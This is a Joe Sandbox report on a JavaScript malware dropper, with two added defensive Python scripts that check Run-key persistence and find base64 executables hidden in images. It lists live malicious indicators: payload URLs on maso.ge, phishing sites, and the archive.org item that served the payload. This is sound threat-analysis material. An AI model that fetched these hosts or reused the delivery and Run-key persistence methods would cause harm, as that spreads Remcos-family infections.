        https://contoso.com/License | powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/Icon | powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://oneget.orgX | powershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://aka.ms/pscore6 | powershell.exe, 00000002.00000002.2231182452.000001D38006D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2231182452.000001D38008A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2231182452.000001D3800BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://ia601606.us.archive.org/10/items/deathnote | powershell.exe, 00000002.00000002.2231182452.000001D3807D8000.00000004.00000800.00020000.00000000.sdmp | true | 0% Virustotal; Avira URL Cloud: safe | unknown
        https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
        https://maso.ge | powershell.exe, 00000004.00000002.2178327964.000001C2003CF000.00000004.00000800.00020000.00000000.sdmp | true | 14% Virustotal; Avira URL Cloud: malware | unknown
        http://ia601606.us.archive.org | powershell.exe, 00000004.00000002.2178327964.000001C201634000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
        https://oneget.org | powershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://ia601606.us.archive.org | powershell.exe, 00000004.00000002.2178327964.000001C20162E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmp | true | 0% Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
195.54.178.4 | maso.ge | Georgia | 51147 | ASDELTATELECOMRU | false
207.241.227.86 | ia601606.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1491471
        Start date and time:2024-08-12 11:36:07 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 55s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:15514541_Doc_Sub(C-A0893)10-08-2024.js
        Detection:MAL
        Classification:mal100.expl.evad.winJS@9/5@2/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 18
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .js
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target powershell.exe, PID 5752 because it is empty
        • Execution Graph export aborted for target powershell.exe, PID 6800 because it is empty
• Not all processes were analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:37:03 | API Interceptor | 45x Sleep call for process: powershell.exe modified
11:37:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\neuromo.js
11:37:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\neuromo.js
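The two Autostart entries above record the persistence this sample installs: a bare .js file under C:\ProgramData written into the per-user Run key, so at logon the shell hands the path to the registered script host (wscript.exe by default) and the dropper re-runs. The Python below is an added hunting check, not part of the Joe Sandbox report or of the sample: it triages Run-key values for bare script-file targets, explicit script hosts and user-writable paths, runs over constructed sample entries (only the neuromo path is taken from this report; the other entry names and commands are assumptions), and on Windows can read the live HKCU/HKLM Run keys through winreg.

```python
import re
import sys

# Extensions the Windows shell hands to a script host (wscript.exe / mshta.exe)
# when they appear bare as a Run value; a .ps1 is not in this list because the
# shell opens it in an editor rather than executing it.
SCRIPT_EXTENSIONS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta")
# Interpreters that execute a script named later on the command line.
SCRIPT_HOSTS = {"wscript", "cscript", "mshta", "powershell", "pwsh"}
# Directories a standard user can write to. Legitimate installers use them too,
# so this is reported as context only and never flips the verdict on its own.
USER_WRITABLE = ("c:\\programdata\\", "\\appdata\\", "c:\\users\\public\\", "\\temp\\")

FIRST_TOKEN = re.compile(r'^"([^"]+)"|^(\S+)')


def first_token(command: str) -> str:
    """Return the executable or script path a Run value starts with (quotes stripped)."""
    m = FIRST_TOKEN.match(command.strip())
    return (m.group(1) or m.group(2)) if m else command.strip()


def classify_run_value(name: str, command: str):
    """Triage one Run value. Returns (suspicious, reasons)."""
    target = first_token(command).lower()
    base = target.rsplit("\\", 1)[-1]
    stem = base.rsplit(".", 1)[0]
    reasons = []
    suspicious = False
    if target.endswith(SCRIPT_EXTENSIONS):
        reasons.append(f"bare script file as Run target ({base}), run by the registered script host")
        suspicious = True
    if stem in SCRIPT_HOSTS:
        reasons.append(f"explicit script host {base} in Run value")
        suspicious = True
    if any(p in command.lower() for p in USER_WRITABLE):
        reasons.append("command references a user-writable directory")
    return suspicious, reasons


def triage(entries):
    """Classify (name, command) pairs; returns a list of (name, suspicious, reasons)."""
    return [(name, *classify_run_value(name, cmd)) for name, cmd in entries]


def collect_run_values():
    """Read the live Run keys on Windows; returns an empty list on other platforms."""
    if sys.platform != "win32":
        return []
    import winreg
    entries = []
    for hive, hive_name in ((winreg.HKEY_CURRENT_USER, "HKCU"), (winreg.HKEY_LOCAL_MACHINE, "HKLM")):
        try:
            key = winreg.OpenKey(hive, r"Software\Microsoft\Windows\CurrentVersion\Run")
        except OSError:
            continue
        i = 0
        while True:
            try:
                value_name, data, _ = winreg.EnumValue(key, i)
            except OSError:  # no more values
                break
            entries.append((f"{hive_name}\\...\\Run\\{value_name}", str(data)))
            i += 1
    return entries


# Constructed sample entries (assumption); only the neuromo path comes from this report.
SAMPLE_RUN_VALUES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("neuromo", r"C:\ProgramData\neuromo.js"),
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("Updater", r'wscript.exe //B "C:\Users\alice\AppData\Roaming\update.vbs"'),
]

if __name__ == "__main__":
    for name, suspicious, reasons in triage(collect_run_values() or SAMPLE_RUN_VALUES):
        flag = "SUSPICIOUS" if suspicious else "ok"
        print(f"{flag:10} {name}: {'; '.join(reasons) or 'no findings'}")
```

The OneDrive entry shows why the user-writable check is context rather than a verdict: it sits under AppData like the malicious entry does, but its target is a signed executable, not a script, and is not flagged.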
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
195.54.178.4 | DHL_Korea_Tax_Invoice_6064457135pdf.vbe | malicious | Remcos, GuLoader | maso.ge/wp-admin/BxlrTaiWcRLrVqryLvLFQ251.bin
195.54.178.4 | Your Transport Plan has Changed - Maersk.vbs | malicious | Remcos, GuLoader | maso.ge/wp-admin/adRrrfS129.bin
195.54.178.4 | BOOKING-CONFIRMATION-APYN1114809.vbs | malicious | Remcos, GuLoader | maso.ge/wp-admin/LsUvkPnHSaqE215.bin
195.54.178.4 | CARGO_DELAY_NOTICE_NEW_SHIPPING_SCHEDULE_AND_ETA.vbs | malicious | Remcos, GuLoader | maso.ge/wp-admin/QKEXNRyGdkQDvPsnL253.bin
195.54.178.4 | DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs | malicious | Remcos, GuLoader | maso.ge/wp-admin/Egotist.snp
207.241.227.86 | Return_shipping_label.js | malicious | Unknown |
207.241.227.86 | INVOICE.js | malicious | StormKitty, XWorm |
207.241.227.86 | doc_1000050408072024.js | malicious | Remcos |
207.241.227.86 | SLIM00260423 LIM-AMS-BOM.js | malicious | Remcos |
207.241.227.86 | Offertopurchase.js | malicious | StormKitty, XWorm |
207.241.227.86 | Offertopurchase.js | malicious | StormKitty, XWorm |
207.241.227.86 | Arrival_Notice_10008616062024.js | malicious | AgentTesla |
207.241.227.86 | Payment Receipt.js | malicious | StormKitty, XWorm |
207.241.227.86 | SCAN_DOC_10008050314-2024.js | malicious | Unknown |
207.241.227.86 | DHL-66445735750-DHL-66445735750-DHL-66445735750.js | malicious | Remcos |
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
maso.ge | DHL_Korea_Tax_Invoice_6064457135pdf.vbe | malicious | Remcos, GuLoader | 195.54.178.4
maso.ge | Your Transport Plan has Changed - Maersk.vbs | malicious | Remcos, GuLoader | 195.54.178.4
maso.ge | BOOKING-CONFIRMATION-APYN1114809.vbs | malicious | Remcos, GuLoader | 195.54.178.4
maso.ge | CARGO_DELAY_NOTICE_NEW_SHIPPING_SCHEDULE_AND_ETA.vbs | malicious | Remcos, GuLoader | 195.54.178.4
maso.ge | DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs | malicious | Remcos, GuLoader | 195.54.178.4
maso.ge | FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbs | malicious | Remcos, GuLoader | 195.54.178.4
maso.ge | Shipment-Receipt-4747474747747-DHL-EXPRESS.vbs | malicious | FormBook, GuLoader | 195.54.178.4
maso.ge | Shipment-Receipt-4747474747747-DHL-EXPRESS.vbs | malicious | FormBook, GuLoader | 195.54.178.4
maso.ge | PO#SI106-2402-05.vbs | malicious | FormBook, GuLoader | 195.54.178.4
maso.ge | BKGCONF-THD1914129-BKGCONF-THD1914129.vbs | malicious | Remcos, GuLoader | 195.54.178.4
ia601606.us.archive.org | Return_shipping_label.js | malicious | Unknown | 207.241.227.86
ia601606.us.archive.org | INVOICE.js | malicious | StormKitty, XWorm | 207.241.227.86
ia601606.us.archive.org | doc_1000050408072024.js | malicious | Remcos | 207.241.227.86
ia601606.us.archive.org | SLIM00260423 LIM-AMS-BOM.js | malicious | Remcos | 207.241.227.86
ia601606.us.archive.org | Offertopurchase.js | malicious | StormKitty, XWorm | 207.241.227.86
ia601606.us.archive.org | Offertopurchase.js | malicious | StormKitty, XWorm | 207.241.227.86
ia601606.us.archive.org | Arrival_Notice_10008616062024.js | malicious | AgentTesla | 207.241.227.86
ia601606.us.archive.org | Payment Receipt.js | malicious | StormKitty, XWorm | 207.241.227.86
ia601606.us.archive.org | SCAN_DOC_10008050314-2024.js | malicious | Unknown | 207.241.227.86
ia601606.us.archive.org | DHL-66445735750-DHL-66445735750-DHL-66445735750.js | malicious | Remcos | 207.241.227.86
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
INTERNET-ARCHIVEUS | solicitud de cotizacion0089087785.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
INTERNET-ARCHIVEUS | Envío de Orden de Compra No. 00501.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
INTERNET-ARCHIVEUS | Return_shipping_label.js | malicious | Unknown | 207.241.227.86
INTERNET-ARCHIVEUS | Comprobante_98756.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
INTERNET-ARCHIVEUS | solicitud de cotizacion--98086.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
INTERNET-ARCHIVEUS | 03286786476_formulario bancario.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
INTERNET-ARCHIVEUS | 086786476_formulario bancario.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
INTERNET-ARCHIVEUS | factura B11-362329013.009.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
INTERNET-ARCHIVEUS | SecuriteInfo.com.Other.Malware-gen.15822.25652.xlsx | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | 74800comprobanteee factura B11-362329013.009.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
ASDELTATELECOMRU | DHL_Korea_Tax_Invoice_6064457135pdf.vbe | malicious | Remcos, GuLoader | 195.54.178.4
ASDELTATELECOMRU | Your Transport Plan has Changed - Maersk.vbs | malicious | Remcos, GuLoader | 195.54.178.4
ASDELTATELECOMRU | BOOKING-CONFIRMATION-APYN1114809.vbs | malicious | Remcos, GuLoader | 195.54.178.4
ASDELTATELECOMRU | CARGO_DELAY_NOTICE_NEW_SHIPPING_SCHEDULE_AND_ETA.vbs | malicious | Remcos, GuLoader | 195.54.178.4
ASDELTATELECOMRU | DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs | malicious | Remcos, GuLoader | 195.54.178.4
ASDELTATELECOMRU | FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbs | malicious | Remcos, GuLoader | 195.54.178.4
ASDELTATELECOMRU | Shipment-Receipt-4747474747747-DHL-EXPRESS.vbs | malicious | FormBook, GuLoader | 195.54.178.4
ASDELTATELECOMRU | Shipment-Receipt-4747474747747-DHL-EXPRESS.vbs | malicious | FormBook, GuLoader | 195.54.178.4
ASDELTATELECOMRU | PO#SI106-2402-05.vbs | malicious | FormBook, GuLoader | 195.54.178.4
ASDELTATELECOMRU | BKGCONF-THD1914129-BKGCONF-THD1914129.vbs | malicious | Remcos, GuLoader | 195.54.178.4
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | DSSd4xRvdt.exe | malicious | Quasar | 195.54.178.4, 207.241.227.86
3b5074b1b5d032e5620f69f9f700ff0e | Quote RF-E68-STD-094.pdf.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 195.54.178.4, 207.241.227.86
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.AutoIt.1430.4587.24786.exe | malicious | Snake Keylogger, VIP Keylogger | 195.54.178.4, 207.241.227.86
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-09a55f0b5ac14dbbbc79ab40abc0b630.r2.dev/index.html | malicious | Unknown | 195.54.178.4, 207.241.227.86
3b5074b1b5d032e5620f69f9f700ff0e | https://datechde.com/ | malicious | Unknown | 195.54.178.4, 207.241.227.86
3b5074b1b5d032e5620f69f9f700ff0e | https://awaisni.github.io/awais-1 | malicious | HTMLPhisher | 195.54.178.4, 207.241.227.86
3b5074b1b5d032e5620f69f9f700ff0e | http://pub-cbaabd801f124c2480bfbff1f6a830e7.r2.dev/index.html | malicious | Unknown | 195.54.178.4, 207.241.227.86
3b5074b1b5d032e5620f69f9f700ff0e | https://kyc-metamaskwallet.webhop.net/927618a1-19574-4cac-b653-8c6be681sd84x6c5/d7a54 | malicious | Phisher | 195.54.178.4, 207.241.227.86
3b5074b1b5d032e5620f69f9f700ff0e | http://instagramexternalwebsite.rf.gd/ | malicious | Unknown | 195.54.178.4, 207.241.227.86
3b5074b1b5d032e5620f69f9f700ff0e | http://zimbra87apoeee.000webhostapp.com/in2p3.html | malicious | Unknown | 195.54.178.4, 207.241.227.86
                            No context
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1628158735648508
                            Encrypted:false
                            SSDEEP:3:NlllulF7///h:NllU
                            MD5:34C16D1FA50B565A72B382C978CB2D56
                            SHA1:6502B5517917B40F8E25CCB08620F21E79D15704
                            SHA-256:612F4AE0F96FA0FEAB88126BFC524CA8D996602FE7EB6D476B91E0F17B852D41
                            SHA-512:4E8B7DA62F407579C261F9C9942A643B3DF6E7BD10EA736AC4B972C89F3C6E516E391420FE0992799F542945C6E2651E155C10356256C020D68B5A3C153EDDAE
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:@...e................................................@..........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Entropy (8bit):3.766721509137304
                            TrID:
                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                            • MP3 audio (1001/1) 32.22%
                            • Lumena CEL bitmap (63/63) 2.03%
                            • Corel Photo Paint (41/41) 1.32%
                            File name:15514541_Doc_Sub(C-A0893)10-08-2024.js
                            File size:687'804 bytes
                            MD5:7877c30c23e5a9a156eec6305499f212
                            SHA1:e50c8c551b7f240ad228cbabf5f65f6f05e02059
                            SHA256:8ddfd33e477594cd5387654a8b6435e906c692c064ddc55422bb4d2fee08723b
                            SHA512:abff546ce49ed3f42084b90fc3d4e32ea0a9088929e5079b1c808894c8552072c1a2b90289f9d071f6f0281ca6da98ba31df6c4ed74531afdba2aa2499bfa87a
                            SSDEEP:12288:4qCO4seCDJoh8eX6aqpvR96FZIhVP0n7GWR31SRSoIon8JtNJncee2ztXD9Rk89Y:mHWl/3VuH8xYkT
                            TLSH:D6E4F75035EAB05CF1F36FA357ED62E98FBBB5622626512E7004034B4A62EC1CE51B73
                            File Content Preview:..v.a.r. .L.W.c.P.d.C.A.c.U.N.i.j.x.W.K.i.G.W.t.Z.f.K.f.e.p.b.o.G.U.a.S.k.A.U.W.L.L.K.G.a.R.P.i.Z.l.C.s.h.k.T.t.C.l.f.z.A.N.S.t.W.b.e.u.U.K.c.R.W.c.a.K.j.C.K.h.K.t.c.S.L.e.J.g.b.Z.J.x.S.G.q.L.C.a.G.s.u.L.g.G.m. .=. .".U.B.U.u.v.L.c.B.s.i.G.m.h.f.n.O.C.k.K
                            Icon Hash:68d69b8bb6aa9a86


Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-12T11:37:07.077733+0200 | TCP | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 443 | 49704 | 207.241.227.86 | 192.168.2.5
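The single IDS hit is ET rule 2049038 on the content returned from 207.241.227.86:443 (ia601606.us.archive.org): something served as an image carries a base64-encoded executable, which the PowerShell stage then decodes and loads. The rule text itself is not on this page. The Python below is an added example, not Joe Sandbox or Emerging Threats code, that implements the generic check such rules make: scan a blob for long base64 runs, look inside each run for the base64 form of an MZ header (the DOS "MZ" magic encodes to "TV" followed by o, p, q or r, so a run that absorbed a few leading image bytes still decodes correctly from that point), decode and confirm. The JPEG-looking header and the DOS stub used as sample input are constructed here, not taken from the sample or from archive.org.

```python
import base64
import re

# A long run of base64 alphabet characters, with optional trailing padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")
# base64(b"MZ" + third byte) always starts "TV" and then o/p/q/r: the low nibble
# of 'Z' fixes the top four bits of the third output character.
MZ_B64 = re.compile(rb"TV[opqr]")

IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"BM": "bmp",
}


def image_type(blob: bytes):
    """Return the image format implied by the leading magic bytes, or None."""
    for magic, name in IMAGE_MAGIC.items():
        if blob.startswith(magic):
            return name
    return None


def find_embedded_pe(blob: bytes, min_b64_len: int = 64):
    """Find base64 runs in blob that decode to data starting with an MZ header.

    Returns a list of (offset, decoded_bytes), offset being where the base64
    text of the payload starts in blob. Each run is tried from every position
    where the base64 form of 'MZ' occurs, so alignment does not depend on the
    run starting exactly at the payload."""
    hits = []
    for run_match in B64_RUN.finditer(blob):
        run = run_match.group(0)
        for mz in MZ_B64.finditer(run):
            chunk = run[mz.start():]
            chunk = chunk[: len(chunk) - len(chunk) % 4]  # whole quads only
            if len(chunk) < min_b64_len:
                continue
            try:
                data = base64.b64decode(chunk, validate=True)
            except ValueError:  # binascii.Error: stray padding or bad quad
                continue
            if data[:2] == b"MZ":
                hits.append((run_match.start() + mz.start(), data))
                break  # one payload per run is enough
    return hits


def scan_image(blob: bytes):
    """Report (image_type, hits): an image type plus a hit is the rule's situation."""
    return image_type(blob), find_embedded_pe(blob)


# Constructed sample input (assumption), not bytes from the analysed sample:
# a minimal DOS stub of the kind every PE begins with ...
DOS_STUB = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    b"\xb8\x00\x00\x00" + b"\x00" * 44
    + b"This program cannot be run in DOS mode.\r\n$"
)
# ... appended in base64 after some JPEG-looking header bytes.
FAKE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00" + b"\x00" * 32
CARRIER = FAKE_JPEG + b"\n" + base64.b64encode(DOS_STUB) + b"\n" + b"\xff\xd9"

if __name__ == "__main__":
    kind, hits = scan_image(CARRIER)
    for offset, payload in hits:
        print(f"{kind}: base64 PE at offset {offset}, {len(payload)} decoded bytes, magic {payload[:2]!r}")
```

Real carriers may split the base64 text with whitespace or HTML tags, which breaks the single-run assumption; stripping those characters before scanning, or lowering min_b64_len, are the knobs to turn when triaging a download that the IDS flagged but this scan misses.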
                            • Total Packets: 359
                            • 443 (HTTPS)
                            • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 12, 2024 11:37:04.688484907 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:04.688519955 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:04.688606977 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:04.698163986 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:04.698172092 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.313420057 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.313507080 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.317073107 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.317079067 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.317493916 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.327838898 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.368509054 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.597919941 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.597951889 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.597974062 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.598011971 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.598037004 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.598069906 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.598079920 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.626002073 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.626024961 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.626111031 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.626121044 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.626147985 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.626163960 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.663604975 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.663625956 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.663724899 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.663741112 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.663783073 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.714421034 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.714449883 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.714554071 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.714565039 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.714603901 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.714615107 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.716276884 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.716300964 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.716366053 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.716372967 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.716413021 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.716422081 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
Aug 12, 2024 11:37:05.717506886 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.717530012 CEST | 443 | 49704 | 207.241.227.86 | 192.168.2.5
Aug 12, 2024 11:37:05.717598915 CEST | 49704 | 443 | 192.168.2.5 | 207.241.227.86
